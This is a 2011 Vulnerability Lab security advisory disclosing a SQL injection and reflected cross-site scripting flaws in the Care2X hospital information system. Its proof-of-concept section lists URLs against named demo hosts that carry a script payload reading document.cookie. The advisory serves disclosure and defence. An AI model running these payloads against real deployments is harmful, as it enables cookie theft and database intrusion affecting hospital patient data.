Care2X Hospital System v2.5.x - Multiple Web Vulnerabilities

Document Title:
===============
Care2X Hospital System v2.5.x - Multiple Web Vulnerabilities



Release Date:
=============
2011-06-24


Vulnerability Laboratory ID (VL-ID):
====================================
69


Product & Service Introduction:
===============================
Integrated Hospital Information System. PHP,mySQL,PostgreSQL. Surgery, Nursing,Outpatient,Wards,Labs, Pharmacy, 
Security,Admission,Schedulers, Repair, Communication & more. Multilanguage, WYSIWYG forms, userconfig, 
embedded workbots. Modular & scalable. 

Care2x HIS is a smart software for hospitals and health care organizations. It is designed to integrate the different 
information systems existing in these organizations into one single efficient system. Care2x HIS solves the problems 
inherent in a network of multiple programs that are noncompatible with each other. It can integrate almost any type of 
services, systems, departments, clinic, processes, data, communication, etc. that exist in a hospital. Its design can 
even handle non-medical services or functions like security, maintenance, etc. It is modular and highly scalable.

Care2x HIS uses a standard SQL database format for storing and retrieving data. The use of a single data format solves 
the problem of data redundancy. When configured accordingly, it can support multiple database configuration to enhance 
data security and integrity. It is a web based software and all its functions can be accessed with a common web browser 
thus there is no need for a special user interface software. All program modules are processed on the server side. Module 
updates and extensions do not require changes on the browsers thus there are no network interruptions and downtimes. 
Its design supports multiple server configuration to distribute traffic and improve speed and efficiency.



(Copy from the Vendor Homepage: http://www.care2x.org/)



Abstract Advisory Information:
==============================
Vulnerability Lab Team discovered multiple Web Vulnerabilities on Care2X Hospital v2.5.x



Vulnerability Disclosure Timeline:
==================================
2011-06-24:	Public or Non-Public Disclosure


Discovery Status:
=================
Published


Exploitation Technique:
=======================
Remote


Severity Level:
===============
High


Technical Details & Description:
================================
1.1 SQL-Injection:
Attackers can execute own SQL statements over the dept_nr parameter in the application.

Server:	http://www.care2x.org
Path:	/foundry/modules/news/
File:	newscolumns.php
Para:	?ntid=false&lang=en&dept_nr=

SQL-Error:
SELECT dept.name_formal, dept.LD_var AS \\\"LD_var\\\", reg.module_start_script, reg.news_editor_script FROM care_registry AS reg, 
care_department AS dept WHERE reg.registry_id=\\\'dept\\\' AND dept.nr=

Screen: ../sql.png


1.2 Input Validation Error
Multiple Input Validation Vulnerabilities are detected on Care2X Hospital. An attacker is able 
to include own maliocus  script codes on client-side(Example;JS). Attackers can get Session-Data(Cookies) of Customers. 
This vulnerabilities can be exploited by remote Attackers. 


Path:		/x/modules/calendar/
File:		calendar-options.php
Para:		?sid=ron1ainhjie40fdj9glt3q5va4&lang=en&day=4&month=10&year=

Server:		care2x.org
Path:		/foundry/modules/news/
File:		editor-pass.php
Para:		?sid=e2be70c3b51bb6de8e81931e2aef38fa&lang=en&target=headline&title=

Server:		care2x.org
Path:		/foundry/modules/news/
File:		headline-read.php
Para:		?ntid=false&lang=

References:
http://www.care2x.org/foundry/modules/news/headline-read.php?ntid=false&lang=[IVE Vulnerability]&nr=78&news_type=headline
http://www.care2x.org/foundry/modules/news/editor-pass.php?sid=e2be70c3b51bb6de8e81931e2aef38fa&lang=en&target=headline&title=[IVE Vulnerability]
http://care2002.sourceforge.net/demo/modules/calendar/calendar-options.php?sid=ron1ainhjie40fdj9glt3q5va4&lang=en&day=4&month=10&year=[IVE Vulnerability]
http://care2002.sourceforge.net/demo/modules/calendar/calendar-options.php?sid=ron1ainhjie40fdj9glt3q5va4&lang=en&day=4&month=[IVE Vulnerability]
http://care2002.sourceforge.net/demo/modules/calendar/calendar-options.php?sid=ron1ainhjie40fdj9glt3q5va4&lang=en&day=[IVE Vulnerability]

Screen: ../xss.png



Proof of Concept (PoC):
=======================
This vulnerabilities can be exploited ...

1.1
http://www.care2x.org/foundry/modules/news/newscolumns.php?ntid=false&lang=en&dept_nr=[SQL-Injection]&user_origin=dept

1.2
http://www.care2x.org/foundry/modules/news/headline-read.php?ntid=false&lang=%3E%22%3Cscript%3Ealert(document.cookie)%3C/script%3E%3Cdiv%20style=%221&nr=78&news_type=headline
http://www.care2x.org/foundry/modules/news/editor-pass.php?sid=e2be70c3b51bb6de8e81931e2aef38fa&lang=en&target=headline&title=%3E%22%3Cscript%3Ealert(document.cookie)%3C/script%3E%3Cdiv%20style=%221
http://care2002.sourceforge.net/demo/modules/calendar/calendar-options.php?sid=ron1ainhjie40fdj9glt3q5va4&lang=en&day=4&month=10&year=%3E%22%3Cscript%3Ealert(document.cookie)%3C/script%3E%3Cdiv%20style=%221
http://care2002.sourceforge.net/demo/modules/calendar/calendar-options.php?sid=ron1ainhjie40fdj9glt3q5va4&lang=en&day=4&month=%3E%22%3Cscript%3Ealert(document.cookie)%3C/script%3E%3Cdiv%20style=%221
http://care2002.sourceforge.net/demo/modules/calendar/calendar-options.php?sid=ron1ainhjie40fdj9glt3q5va4&lang=en&day=%3E%22%3Cscript%3Ealert(document.cookie)%3C/script%3E%3Cdiv%20style=%221



Security Risk:
==============
1.1
Attacks can attack the application with a sql-injection over a not secured function.
The risk of the vulnerability is estimated as high.

1.2
Attackers can manipulate the application requests with xss on the client-side.
The security risk is estimated as low due to the client-side basement.


Credits & Authors:
==================
Vulnerability Research Laboratory


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       - www.vulnerability-lab.com/register
Contact:    [email protected] 	- [email protected] 	       - [email protected]
Section:    video.vulnerability-lab.com 	- forum.vulnerability-lab.com 		       - news.vulnerability-lab.com
Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       - youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   - vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and 
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), 
modify, use or edit our material contact ([email protected] or [email protected]) to get a permission.

    				   	Copyright © 2012 | Vulnerability Laboratory